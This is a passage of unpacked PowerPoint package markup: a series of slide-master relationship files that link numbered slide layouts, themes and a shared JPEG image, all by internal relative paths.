Target="../theme/theme107.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1070.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1061.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster108.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1079.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1078.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1077.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1076.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1075.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1074.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1073.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1072.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme108.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1080.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1071.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster109.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1089.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1088.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1087.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1086.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1085.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1084.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1083.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1082.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme109.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1090.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1081.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09.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout108.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout107.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout106.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout105.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout104.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout103.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout102.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme11.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout110.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout101.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster110.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1099.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1098.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1097.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1096.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1095.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1094.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1093.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1092.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme110.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1100.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1091.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster111.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1109.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1108.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1107.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1106.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1105.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1104.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1103.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1102.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme111.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1110.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1101.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster112.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1119.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1118.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1117.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1116.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1115.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1114.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1113.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1112.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme112.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1120.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1111.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster113.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1129.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1128.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1127.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1126.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1125.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1124.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1123.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1122.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme113.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1130.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1121.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster114.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1139.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1138.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1137.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1136.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1135.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1134.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1133.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1132.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme114.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1140.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1131.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster115.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1149.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1148.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1147.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1146.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1145.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1144.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1143.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1142.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme115.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1150.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1141.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster116.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1159.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1158.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1157.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1156.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1155.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1154.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1153.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1152.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme116.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1160.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1151.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster117.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1169.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1168.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1167.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1166.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1165.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1164.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1163.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1162.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme117.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1170.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1161.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster118.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1179.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1178.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1177.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1176.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1175.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1174.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1173.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1172.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme118.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1180.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout117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2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><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29.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout128.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout127.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout126.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout125.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout124.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout123.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout122.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme13.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout130.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout121.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39.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout138.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout137.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout136.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout135.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout134.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout133.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout132.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme14.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout140.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout131.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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme15.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><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59.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout158.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout157.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout156.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout155.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout154.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout153.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout152.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme16.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout160.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout151.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69.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout168.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout167.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout166.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout165.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout164.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout163.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout162.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme17.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout170.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout161.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79.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout178.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout177.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout176.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout175.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout174.xml"/><Relationship Id="rId3" 